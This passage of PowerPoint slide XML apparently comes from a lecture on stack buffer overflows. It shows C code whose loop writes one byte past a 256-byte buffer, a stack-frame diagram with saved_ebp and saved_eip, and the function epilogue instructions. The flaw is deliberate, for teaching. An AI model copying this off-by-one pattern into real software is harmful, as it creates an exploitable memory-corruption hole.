                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> &lt;= 256; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>++) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>  {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>    buffer[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>]=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>sm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>]; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>  }</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>main</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>argc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>char *</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>[]) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>  if (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>argc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> &lt; 2) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>printf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>("missing </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>args</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>\n");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>    exit(-1);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>  }</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>func</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>[1]);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>  return 0;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="119973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00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00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1002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1002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1002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1002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10020">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10020">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10020">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10020">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10020">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10020">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10020">
                                            <p:txEl>
                                              <p:pRg st="14" end="1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110020">
                                            <p:txEl>
                                              <p:pRg st="15" end="1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110020">
                                            <p:txEl>
                                              <p:pRg st="16" end="1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110020">
                                            <p:txEl>
                                              <p:pRg st="18" end="18"/>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110020">
                                            <p:txEl>
                                              <p:pRg st="20" end="2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110020">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066" name="Text Box 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="304800" y="4322789"/>
            <a:ext cx="1912703" cy="338554"/>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dirty="0" err="1">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t> %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>ebp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>, %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>esp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:latin typeface="Courier" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1112067" name="Text Box 3"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="304802" y="4608539"/>
            <a:ext cx="2378075"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dirty="0">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>pop %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>ebp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:latin typeface="Times" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1112068" name="Text Box 4"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="304800" y="4951439"/>
            <a:ext cx="2362200"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a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>ret</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400">
              <a:latin typeface="Times" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1112069" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6477000" y="1085850"/>
            <a:ext cx="2057400" cy="3200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1112070" name="Rectangle 6"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6477000" y="26860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buffer[255]</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1112071" name="Rectangle 7"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6477000" y="29718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buffer[254]</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1112072" name="Rectangle 8"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6477000" y="37147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buffer[0]</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1112073" name="Rectangle 9"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6477000" y="40005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int i</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="2" name="Group 10"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="7404100" y="3333750"/>
            <a:ext cx="76200" cy="285750"/>
            <a:chOff x="1392" y="2880"/>
            <a:chExt cx="48" cy="240"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1112075" name="Oval 11"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1392" y="2880"/>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12076" name="Oval 12"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1392" y="2976"/>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12077" name="Oval 13"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1392" y="3072"/>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grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1112078" name="Rectangle 14"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6477000" y="21145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saved_eip</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1112079" name="Rectangle 15"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6477000" y="12001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dirty="0" err="1">
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>argc</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:latin typeface="Courier"/>
              <a:cs typeface="Courier"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1112080" name="Rectangle 16"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6477000" y="1485900"/>
            <a:ext cx="2057400" cy="6286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argv</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1112081" name="Rectangle 17"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6477000" y="50292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esp</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1112082" name="Rectangle 18"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6477000" y="531495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ebp</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1112083" name="Rectangle 19"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6477000" y="56007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pc</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1112084" name="AutoShape 20"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8610600" y="1200150"/>
            <a:ext cx="152400" cy="914400"/>
          </a:xfrm>
          <a:prstGeom prst="rightBrace">
            <a:avLst>
              <a:gd name="adj1" fmla="val 66667"/>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12085" name="AutoShape 21"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8610600" y="2114550"/>
            <a:ext cx="152400" cy="2171700"/>
          </a:xfrm>
          <a:prstGeom prst="rightBrace">
            <a:avLst>
              <a:gd name="adj1" fmla="val 158333"/>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12086" name="Rectangle 22"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6477000" y="24003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saved_ebp</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1112087" name="Text Box 23"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="5400000">
            <a:off x="8399861" y="15464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dirty="0">
                <a:latin typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>main()</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1112088" name="Text Box 24"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="5400000">
            <a:off x="8399861" y="30323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charset="0"/>
              </a:rPr>
              <a:t>func()</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1112089" name="Text Box 25"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="304800" y="2228852"/>
            <a:ext cx="3326552" cy="2086725"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
